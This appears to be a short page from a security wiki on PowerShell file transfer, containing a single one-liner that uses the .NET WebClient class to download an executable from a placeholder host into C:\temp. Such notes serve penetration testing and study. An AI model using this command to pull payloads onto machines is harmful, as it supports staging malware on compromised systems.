Wiki : ./Security/Windows/Languages/Powershell/File_Transfer.md

Implemented .NET classes: Microsoft

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://x.x.x.x/bin.exe','C:\temp\binary.exe')"